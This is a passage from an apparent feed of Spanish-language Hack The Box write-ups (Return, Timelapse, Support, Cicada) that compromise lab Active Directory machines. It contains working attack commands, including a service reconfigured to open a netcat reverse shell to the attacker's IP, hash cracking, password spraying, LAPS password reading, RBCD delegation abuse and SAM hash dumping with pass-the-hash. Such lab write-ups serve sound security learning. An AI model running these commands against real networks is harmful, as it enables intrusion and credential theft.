PRINTER Share Permissions Remark SMB 10.10.11.108 445 PRINTER ----- ----------- ------ SMB 10.10.11.108 445 PRINTER ADMIN$ READ Remote Admin SMB 10.10.11.108 445 PRINTER C$ READ,WRITE Default share SMB 10.10.11.108 445 PRINTER IPC$ READ Remote IPC SMB 10.10.11.108 445 PRINTER NETLOGON READ Logon server share SMB 10.10.11.108 445 PRINTER SYSVOL READ Logon server share ``` ```zsh smbmap -H 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' -r 'ADMIN$' --depth 10 ``` ```zsh ldapdomaindump -u 'return.local\\svc-printer' -p '1edFg43012!!' -n 10.10.11.108 return.local ``` ![image](image-5.png) ```zsh nxc winrm 10.10.11.108 -u 'svc-printer' -p '1edFg43012!!' ``` ![image](image-6.png) ## PrivEsc ```powershell whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= =================================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemtimePrivilege Change the system time Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone ``` ### SeBackupPrivilege https://juggernaut--sec-com.translate.goog/sebackupprivilege/?_x_tr_sl=en&_x_tr_tl=es&_x_tr_hl=es&_x_tr_pto=tc ```powershell reg save hklm\\system C:\\temp\\SYSTEM reg save hklm\\sam C:\\temp\\sam ``` ![image](image-7.png) Desafortunadamente no es valida el hash ![image](image-8.png) Tampoco dumpeando el ntds.dit ![image](image-9.png) ```powershell net user svc-printer User name svc-printer Full Name SVCPrinter Comment Service Account for Printer User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 5/26/2021 1:15:13 AM Password expires Never Password changeable 5/27/2021 1:15:13 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 5/26/2021 1:39:29 AM Logon hours allowed All Local Group Memberships *Print Operators *Remote Management Use *Server Operators Global Group memberships *Domain Users The command completed successfully. ``` ### Server Operators Sus miembros pueden iniciar sesión en un servidor, iniciar y detener servicios, acceder a controladores de dominio, realizar tareas de mantenimiento (como copias de seguridad y restauraciones) y tienen la capacidad de cambiar binarios instalados en los controladores de dominio. https://www.thehacker.recipes/ad/movement/builtins/security-groups ``` services ``` ![image](image-10.png) - Upload nc.exe ``` upload ../nc.exe ``` ```powershell sc.exe config VMTools binPATH=\"C:\\temp\\nc.exe -e cmd.exe 10.10.14.5 1234\" ``` ```powershell sc.exe stop VMTools sc.exe start VMTools ``` ![image](image-11.png) #### NT Authority System ![image](image-12.png)"},{"id":"timelapse","title":"HTB - Timelapse","description":"Timelapse","date":"2025-08-10T00:00:00.000Z","tags":["FootPrinting","kerberos","kerbrute","zip2john","PFX","Crt","Powershell","Enumerate"],"authors":["r4cc0x"],"url":"/blog/timelapse","content":"```zsh ping -c 3 10.10.11.152 PING 10.10.11.152 (10.10.11.152) 56(84) bytes of data. 64 bytes from 10.10.11.152: icmp_seq=1 ttl=127 time=62.1 ms 64 bytes from 10.10.11.152: icmp_seq=2 ttl=127 time=147 ms 64 bytes from 10.10.11.152: icmp_seq=3 ttl=127 time=356 ms ``` ## Recon ```zsh sudo nmap -p- --open --min-rate 5000 -v -n -Pn 10.10.11.152 -oG allPorts nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49693,49725 10.10.11.152 -oN targeted ``` ```zsh # Nmap 7.95 scan initiated Sun Aug 10 03:58:31 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5986,9389,49667,49673,49674,49693,49725 -oN targeted 10.10.11.152 Nmap scan report for 10.10.11.152 Host is up (0.073s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-10 15:58:37Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found | ssl-cert: Subject: commonName=dc01.timelapse.htb | Not valid before: 2021-10-25T14:05:29 |_Not valid after: 2022-10-25T14:25:29 | tls-alpn: |_ http/1.1 |_ssl-date: 2025-08-10T16:00:08+00:00; +7h59m58s from scanner time. |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49693/tcp open msrpc Microsoft Windows RPC 49725/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-08-10T15:59:30 |_ start_date: N/A |_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Aug 10 04:00:12 2025 -- 1 IP address (1 host up) scanned in 100.71 seconds ``` - El puerto 5985 está configurados para **exigir conexiones HTTPS** en WinRM, por lo cual para establecer una conexcion usaremos la opcion ``-S``. ```zsh echo \"10.10.11.152 timelapse.htb\" | sudo tee -a /etc/hosts ``` ```zsh nxc smb 10.10.11.152 SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False) ``` ```zsh nxc smb 10.10.11.152 -u 'guest' -p '' --shares SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False) SMB 10.10.11.152 445 DC01 [+] timelapse.htb\\guest: SMB 10.10.11.152 445 DC01 [*] Enumerated shares SMB 10.10.11.152 445 DC01 Share Permissions Remark SMB 10.10.11.152 445 DC01 ----- ----------- ------ SMB 10.10.11.152 445 DC01 ADMIN$ Remote Admin SMB 10.10.11.152 445 DC01 C$ Default share SMB 10.10.11.152 445 DC01 IPC$ READ Remote IPC SMB 10.10.11.152 445 DC01 NETLOGON Logon server share SMB 10.10.11.152 445 DC01 Shares READ SMB 10.10.11.152 445 DC01 SYSVOL Logon server share ``` - User Enumeration ```zsh nxc smb 10.10.11.152 -u 'guest' -p '' --rid-brute ``` ``` DnsAdmins DnsUpdateProxy thecybergeek payl0ad legacyy sinfulz babywyrm DB01$ WEB01$ DEV01$ LAPS_Readers Development HelpDesk svc_deploy ``` ### Kerbrute ```zsh kerbrute userenum --dc 10.10.11.152 -d timelapse.htb users ``` ![image](image.png) - Archivos Compartidos ```zsh smbclient //10.10.11.152/Shares -U 'guest' ``` ```zsh smb: \\> dir . D 0 Mon Oct 25 11:39:15 2021 .. D 0 Mon Oct 25 11:39:15 2021 Dev D 0 Mon Oct 25 15:40:06 2021 HelpDesk D 0 Mon Oct 25 11:48:42 2021 ``` `winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021` ```zsh 7z l winrm_backup.zip -- Path = winrm_backup.zip Type = zip Physical Size = 2611 Date Time Attr Size Compressed Name ------------------- ----- ------------ ------------ ------------------------ 2021-10-25 10:21:20 ..... 2555 2405 legacyy_dev_auth.pfx ------------------- ----- ------------ ------------ ------------------------ 2021-10-25 10:21:20 2555 2405 1 files ``` ```zsh zip2john winrm_backup.zip ``` ![image](image-1.png) ```zsh john hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx) 1g 0:00:00:00 DONE (2025-08-10 12:28) 4.000g/s 13910Kp/s 13910Kc/s 13910KC/s surkerior..supalove Use the \"--show\" option to display all of the cracked passwords reliably Session completed. ``` ```zsh pfx2john legacyy_dev_auth.pfx > legacy.hash ``` ```zsh john legacy.hash -w=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 AVX 4x]) Cost 1 (iteration count) is 2000 for all loaded hashes Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes Will run 6 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status thuglegacy (legacyy_dev_auth.pfx) 1g 0:00:00:35 DONE (2025-08-10 12:43) 0.02801g/s 90503p/s 90503c/s 90503C/s thugways..thugers1 Use the \"--show\" option to display all of the cracked passwords reliably ``` ## PFX Extracted Abrimos el archivo legacyy_dev_auth.pfx junto con la contraseña que obtuvimos. ![image](image-2.png) Teniendo un RSA Key podemos extaer la llave privada. ```zsh openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out keyrpiv.pem ``` `thuglegacy` Ahora lo mismo para el certificado ```zsh openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -out legacyy.crt ``` Desencriptamos la llave privada ```zsh openssl rsa -in keypriv.pem -out key.pem ``` ## Legacyy User ```zsh evil-winrm --ssl -i 10.10.11.152 -k key.pem -c legacyy.crt ``` ![image](image-3.png) ## PowerShell History (PSReadLine) ```powershell C:\\users\\legacyy\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine ``` ![image](image-4.png) ```powershell svc_deploy E3R$Q62^12p7PLlC%KWaxuaV ``` ```zsh evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S ``` ```powershell net user svc_deploy User name svc_deploy Full Name svc_deploy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/25/2021 12:12:37 PM Password expires Never Password changeable 10/26/2021 12:12:37 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 10/25/2021 12:25:53 PM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *LAPS_Readers *Domain Users ``` https://www.thehacker.recipes/ad/movement/dacl/readlapspassword El atacante puede entonces leer la contraseña de LAPS de la cuenta del equipo (es decir, la contraseña del administrador local del equipo). ```powershell Get-ADComputer -filter {ms-mcs-admpwdexpirationtime -like '*'} -prop 'ms-mcs-admpwd','ms-mcs-admpwdexpirationtime' ``` ![image](image-5.png) ``` ,n2L]8D/#,[136{C0WU;{c3o ``` ```zsh evil-winrm -i 10.10.11.152 -u Administrator -p ',n2L]8D/#,[136{C0WU;{c3o' -S ``` ![image](image-6.png)"},{"id":"support","title":"HTB - Support","description":"Support","date":"2025-08-08T00:00:00.000Z","tags":["Decompile-Binary","WireShark","Spraying","LDAP","BloodHound","RBCD","PowerView","PoweMad","ACL","impacket","getST","PsExec"],"authors":["r4cc0x"],"url":"/blog/support","content":"```zsh ping -c 3 10.10.11.174 PING 10.10.11.174 (10.10.11.174) 56(84) bytes of data. 64 bytes from 10.10.11.174: icmp_seq=1 ttl=127 time=62.9 ms 64 bytes from 10.10.11.174: icmp_seq=2 ttl=127 time=62.3 ms 64 bytes from 10.10.11.174: icmp_seq=3 ttl=127 time=62.9 ms ``` # Recon ```zsh sudo nmap -p- --open --min-rate 5000 -v -n -Pn 10.10.11.174 -oG allPorts nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49668,49674,49686,49691,49710 10.10.11.174 -oN targeted PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-07 23:57:21Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: support.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 9389/tcp open mc-nmf .NET Message Framing 49664/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49686/tcp open msrpc Microsoft Windows RPC 49691/tcp open msrpc Microsoft Windows RPC 49710/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-08-07T23:58:15 |_ start_date: N/A |_clock-skew: -6s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required ``` ```zsh nxc smb 10.10.11.174 SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) ``` ```zsh nxc smb 10.10.11.174 -u 'guest' -p '' --shares SMB 10.10.11.174 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:False) SMB 10.10.11.174 445 DC [+] support.htb\\guest: SMB 10.10.11.174 445 DC [*] Enumerated shares SMB 10.10.11.174 445 DC Share Permissions Remark SMB 10.10.11.174 445 DC ----- ----------- ------ SMB 10.10.11.174 445 DC ADMIN$ Remote Admin SMB 10.10.11.174 445 DC C$ Default share SMB 10.10.11.174 445 DC IPC$ READ Remote IPC SMB 10.10.11.174 445 DC NETLOGON Logon server share SMB 10.10.11.174 445 DC support-tools READ support staff tools SMB 10.10.11.174 445 DC SYSVOL Logon server share ``` ### Share Files ```zsh smbclient //10.10.11.174/support-tools -U 'guest' ``` ![alt text](image.png) Decompile Binary - UserInfo.exe ![alt text](image-1.png) ```C++ enc_password = \"0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E\"; key = Encoding.ASCII.GetBytes(\"armando\"); this.entry = new DirectoryEntry(\"LDAP://support.htb\", \"support\\\\ldap\", Protected.getPassword()); ``` ``` sudo apt install mono-complete ``` ```zsh mono UserInfo.exe -v find -first seawolf [*] LDAP query to use: (givenName=seawolf) [-] Exception: No Such Object ``` ### WireShark `Follow -> TCP Stream` ![alt text](image-2.png) ```zsh nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz ``` ## Password Spraying ```zsh nxc smb 10.10.11.174 -u EnumUsers -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --continue-on-success ``` ```zsh SMB 10.10.11.174 445 DC [+] support.htb\\DnsAdmins:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (Guest) SMB 10.10.11.174 445 DC [+] support.htb\\DnsUpdateProxy:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (Guest) SMB 10.10.11.174 445 DC [+] support.htb\\Shared:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz (Guest) SMB 10.10.11.174 445 DC [+] support.htb\\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz ``` ## LDAP ```zsh ldapsearch -x -H ldap://10.10.11.174 -D 'support\\ldap' -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b \"DC=support,DC=htb\" | grep -i \"samaccountname: support\" -B 30 -A11 ``` ```zsh cn: support c: US l: Chapel Hill st: NC postalCode: 27514 distinguishedName: CN=support,CN=Users,DC=support,DC=htb instanceType: 4 whenCreated: 20220528111200.0Z whenChanged: 20220528111201.0Z uSNCreated: 12617 info: Ironside47pleasure40Watchful memberOf: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb memberOf: CN=Remote Management Users,CN=Builtin,DC=support,DC=htb uSNChanged: 12630 company: support streetAddress: Skipper Bowles Dr name: support objectGUID:: CqM5MfoxMEWepIBTs5an8Q== userAccountControl: 66048 badPwdCount: 1 codePage: 0 countryCode: 0 badPasswordTime: 133990994565909434 lastLogoff: 0 lastLogon: 0 pwdLastSet: 132982099209777070 primaryGroupID: 513 objectSid:: AQUAAAAAAAUVAAAAG9v9Y4G6g8nmcEILUQQAAA== accountExpires: 9223372036854775807 logonCount: 0 sAMAccountName: support sAMAccountType: 805306368 objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb dSCorePropagationData: 20220528111201.0Z dSCorePropagationData: 16010101000000.0Z ``` ![alt text](image-3.png) ```zsh evil-winrm -i 10.10.11.174 -u support -p 'Ironside47pleasure40Watchful' ``` ![alt text](image-4.png) ## BloodHound ```zsh bloodhound-python -d support.htb -u support -p 'Ironside47pleasure40Watchful' -ns 10.10.11.174 -c All --zip -c All ``` https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart ![alt text](image-5.png) Agregamos `dc.support.htb` a nuestro archivo hosts. ![alt text](image-6.png) ## Resource-Based Constrained Delegation (RBCD) \"GenericAll\" concede a \"SHARED SUPPORT [ACCOUNTS@SUPPORT.HTB](https://mailto:ACCOUNTS@SUPPORT.HTB)\" el permiso para escribir en el atributo \"msds-KeyCredentialLink\" de DC.SUPPORT.HTB. Escribir en esta propiedad permite a un atacante crear \"Shadow Credentials\" (Credenciales Sombras) en el objeto y autenticarse como el principal usando Kerberos PKINIT. Esto es equivalente al borde \"AddKeyCredentialLink\". Alternativamente, \"GenericAll\" en un objeto de computadora puede usarse para realizar un ataque de \"Resource-Based Constrained Delegation\" (Delegación Restringida Basada en Recursos). ![alt text](image-7.png) Primero, si un atacante no controla una cuenta con un SPN configurado, se puede utilizar el proyecto **Powermad** de Kevin Robertson para agregar una nueva cuenta de equipo controlada por el atacante: https://github.com/Kevin-Robertson/Powermad/blob/master/Powermad.ps1 https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1 ```powershell Import-Module Powermad.ps1 Import-Module PowerView.ps1 ``` Ahora crearemos una nueva cuenta de equipo (machine account) con herramientas como **Powermad** (esto es posible porque los usuarios del dominio suelen tener permiso para crear cuentas de equipo por defecto). ```powershell New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force) ``` ![alt text](image-8.png) https://www.thehacker.recipes/ad/movement/kerberos/delegations/rbcd#practice Obtenemos el SID de la cuenta para construir un ACL (Control de Acceso) que permita a esta cuenta delegar en el DC. ```powershell $ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid ``` Definimos una ACL que otorga a attackersystem el permiso para actuar en nombre de otros usuarios (Delegacion RBCD) ```powershell $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList \"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$ComputerSid)\" ``` Convertimos el descriptor de seguridad a bytes ```powershell $SDBytes = New-Object byte[] ($SD.BinaryLength) ``` ```powershell $SD.GetBinaryForm($SDBytes, 0) ``` Aplicar el descriptor al DC (Modifica el atributo `msDS-AllowedToActOnBehalf0f0therIdentity` del DC para permitir que attackersystem delegue en él) ```powershell Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} ``` ## impacket-getST https://www.thehacker.recipes/ad/movement/kerberos/delegations/constrained ```zsh impacket-getST -spn \"cifs/dc.support.htb\" -impersonate \"Administrator\" -dc-ip 10.10.11.174 'support.htb/attackersystem$:Summer2018!' ``` ![alt text](image-9.png) ### PsExec ```zsh KRB5CCNAME=Administrator@cifs_dc.support.htb@SUPPORT.HTB.ccache impacket-psexec -k -no-pass dc.support.htb ``` Rooted"},{"id":"cicada","title":"HTB - Cicada","description":"Cicada","date":"2025-08-04T00:00:00.000Z","tags":["smb","Information-Disclosure","Spraying","ldap","RPC","SeBackupPrivilege","SecretsDump"],"authors":["r4cc0x"],"url":"/blog/cicada","content":"```zsh ping -c 3 10.10.11.35 PING 10.10.11.35 (10.10.11.35) 56(84) bytes of data. 64 bytes from 10.10.11.35: icmp_seq=1 ttl=127 time=62.0 ms 64 bytes from 10.10.11.35: icmp_seq=2 ttl=127 time=62.9 ms 64 bytes from 10.10.11.35: icmp_seq=3 ttl=127 time=62.1 ms ``` ## Recon ```zsh sudo nmpa -p- --open --min-rate 5000 -n -v -Pn 10.10.11.35 -oG allPorts nmap -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,51362 10.10.11.35 -oN targeted # Nmap 7.95 scan initiated Sun Aug 3 20:59:21 2025 as: /usr/lib/nmap/nmap --privileged -sCV -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,51362 -oN targeted 10.10.11.35 Nmap scan report for 10.10.11.35 Host is up (0.063s latency). PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-04 07:59:29Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cicada.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: commonName=CICADA-DC.cicada.htb | Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1: , DNS:CICADA-DC.cicada.htb | Not valid before: 2024-08-22T20:24:16 |_Not valid after: 2025-08-22T20:24:16 |_ssl-date: TLS randomness does not represent time 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 51362/tcp open msrpc Microsoft Windows RPC Service Info: Host: CICADA-DC; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-time: | date: 2025-08-04T08:00:23 |_ start_date: N/A | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required |_clock-skew: 7h00m01s Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Aug 3 21:00:58 2025 -- 1 IP address (1 host up) scanned in 97.10 seconds ``` ```zsh nxc smb 10.10.11.35 SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False) ``` ```zsh echo \"10.10.11.35 cicada.htb cicada-dc.cicada.htb\" | sudo tee -a /etc/hosts ``` ```zsh nxc smb 10.10.11.35 -u 'guest' -p '' --shares ``` ![image](image.png) Puedo leer HR y IPC$ ```zsh smbclient //10.10.11.35/HR -U 'guest' ``` ![image](image-1.png) Descargamos el archivo txt con ``get \"Notice from HR.txt\"``. ``` Dear new hire! Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure. Your default password is: Cicada$M6Corpb*@Lp#nZp!8 To change your password: 1. Log in to your Cicada Corp account** using the provided username and the default password mentioned above. 2. Once logged in, navigate to your account settings or profile settings section. 3. Look for the option to change your password. This will be labeled as \"Change Password\". 4. Follow the prompts to create a new password**. Make sure your new password is strong, containing a mix of uppercase letters, lowercase letters, numbers, and special characters. 5. After changing your password, make sure to save your changes. Remember, your password is a crucial aspect of keeping your account secure. Please do not share your password with anyone, and ensure you use a complex password. If you encounter any issues or need assistance with changing your password, don't hesitate to reach out to our support team at support@cicada.htb. Thank you for your attention to this matter, and once again, welcome to the Cicada Corp team! Best regards, Cicada Corp ``` Tenemos contraseña pero no sabemos para que usuario, por lo tanto, podriamos utilizar el usuario guest para realizar un ataque de fuerza bruta para enumerar usuarios en el Dominio. ```d Cicada$M6Corpb*@Lp#nZp!8 ``` ```zsh nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep \"SidTypeUser\" ``` ![image](image-2.png) ```zsh cat users | awk 'NF{print $6}' | sed 's/CICADA\\\\//' ``` ``` Administrator Guest krbtgt CICADA-DC$ john.smoulder sarah.dantelia michael.wrightson david.orelious emily.oscars ``` ## Password Spraying ```zsh nxc smb 10.10.11.35 -u users -p 'Cicada$M6Corpb*@Lp#nZp!8' --continue-on-success ``` ```zsh cicada.htb\\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8 ``` ### SMBMAP Quiza encontremos algo diferente teniendo credenciales validas ```zsh smbmap -H 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -r 'HR' --depth 10 ``` Aunque podemos ver en los archivos SYSVOL y NETLOGON , no encontramos nada importante. Podriamos ver mayor informacion con `ldapdomaindump` ```zsh ldapdomaindump -u 'cicada.htb\\michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' -n 10.10.11.35 cicada-dc.cicada.htb ``` ![image](image-3.png) Unico usuario en el grupo `REMOTE MANAGEMENT USERS` y `BACKUP OPERATORS` es emily.oscars. Usuario con contraseña en la descripcion es ``david.orelious`` ``` aRt$Lp#7t*VQ!3 ``` Incluso podemos verla con el comando rpcclient ```zsh rpcclient -U 'michael.wrightson%Cicada$M6Corpb*@Lp#nZp!8' 10.10.11.35 -c 'querydispinfo' ``` ![image](image-4.png) David ahora nos permite leer en el directoprio de DEV ```zsh nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' --shares ``` ![image](image-5.png) ```zsh smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -r 'DEV' --depth 10 ``` ![image](image-6.png) Para descargar con smbmap le indicamos el parametro --download ```zsh smbmap -H 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp#7t*VQ!3' -r 'DEV' --depth 10 --download './DEV/Backup_script.ps1' ``` ```powershell catn Backup_script.ps1 $sourceDirectory = \"C:\\smb\" $destinationDirectory = \"D:\\Backup\" $username = \"emily.oscars\" $password = ConvertTo-SecureString \"Q!3@Lp#M6b*7t*Vt\" -AsPlainText -Force $credentials = New-Object System.Management.Automation.PSCredential($username, $password) $dateStamp = Get-Date -Format \"yyyyMMdd_HHmmss\" $backupFileName = \"smb_backup_$dateStamp.zip\" $backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath Write-Host \"Backup completed successfully. Backup file saved to: $backupFilePath\" ``` Validamos las credenciales de emily: ```zsh nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' ``` ![image](image-7.png) Listamos los recursos compartidos para ver si podemos ver algo nuevo ```zsh nxc smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt' --shares ``` ![image](image-8.png) ```zsh evil-winrm -i 10.10.11.35 -u emily.oscars -p 'Q!3@Lp#M6b*7t*Vt' ``` ## Priv-Esc `whoami /priv` ![image](image-9.png) ```powershell C:\\ ``` `mkdir temp` ```powershell reg save hklm\\system C:\\temp\\SYSTEM ``` ```powershell reg save hklm\\sam C:\\temp\\sam ``` ![image](image-10.png) Descargamos ambos archivos ```zsh impacket-secretsdump -sam sam -system SYSTEM local ``` ```zsh Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies [*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620 [*] Dumping local SAM hashes (uid:rid:lmhash:nthash) Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: [*] Cleaning up... ``` Validamos el hash del Administrator ```zsh nxc winrm 10.10.11.35 -u 'Administrator' -H '2b87e7c93a3e8a0ea4a581937016f341' ``` ![image](image-11.png)"},{"id":"travel","title":"HTB - 